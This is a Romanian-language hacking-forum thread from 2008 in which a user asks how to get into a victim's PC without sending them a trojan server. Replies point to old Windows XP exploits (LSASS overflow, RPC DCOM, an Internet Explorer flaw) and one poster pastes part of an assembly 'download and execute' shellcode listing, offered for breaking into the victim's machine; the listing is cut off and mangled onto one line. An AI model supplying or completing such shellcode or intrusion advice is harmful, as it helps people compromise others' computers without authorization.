H4e Posted February 11, 2008 Report Share Posted February 11, 2008 Am si eu o intrbare: Exista o metoda de a intra intrun PC fara sai trimitem victimei un server????Adik fara troieni k aia necesita server fara telnnet k shi ala necsita un port deschis deci trebuie sai trimitem cev victimei.Exista o metoda kre nu necesita asta?? Quote Link to comment Share on other sites More sharing options...
moubik Posted February 11, 2008 Report Share Posted February 11, 2008 da, sa foloseasca linux, sa aiba portul deschis, fara parola pe root.tu ce crezi ?fa niste presupuneri. Quote Link to comment Share on other sites More sharing options...
Boxer Posted February 11, 2008 Report Share Posted February 11, 2008 nu Quote Link to comment Share on other sites More sharing options...
H4e Posted February 11, 2008 Author Report Share Posted February 11, 2008 K, exceptand linux p Windows se poate acelashi lucru?? Quote Link to comment Share on other sites More sharing options...
virusz Posted February 11, 2008 Report Share Posted February 11, 2008 sunt nspe metode...depinde de sistemul de operare al victimei, sa zicem ca victima are os: winxp sp1 ,poti folosi Lsass buffer owerflow vuln, sau RPC Dcom, astea sunt 2 vulnerabilitati ale lui winxp ->sp1, sp2 e patched... sunt si alte exploituri dar nu sunt toate publicepoti folosi o vuln de IE care executa un anumit fisier...is mai multe metode .. sunt foarte vechi astea ce ti le-am spus si nu prea mai ai sanse sa te bucuri prea mult de ele!...bafta! Quote Link to comment Share on other sites More sharing options...
SirGod Posted February 11, 2008 Report Share Posted February 11, 2008 foloseste exploitul asta de download&execute ...e in ASM ia un compilator ca MASM,TASM,FASM si altele..;Tiny Download&&Exec ShellCode codz czy 2007.6.1;header 163=61(16+8+9+(28))+95(68+27)+17;163+19=192comment % #--------------------------------------# # # Tiny Download&&Exec ShellCode--> # # # -->size 192 # # # 2007.06.01 # # codz: czy # # # www.ph4nt0m.org # # #------------------------------------------# #system :test on ie6+XPSP2/2003SP2/2kSP4%.586.model flat,stdcalloption casemap:noneinclude c:\masm32\include\windows.incinclude c:\masm32\include\kernel32.incincludelib c:\masm32\lib\kernel32.libinclude c:\masm32\include\user32.incincludelib c:\masm32\lib\user32.lib.datashelldatabuffer db 1024 dup(0)shellcodebuffer db 2046 dup(0)downshell db 'down exploit',0.codestart: invoke MessageBoxA,0,offset downshell,offset downshell,1 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 mov eax,offset shellcodebuffer jmp eax somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h; Quote Link to comment Share on other sites More sharing options...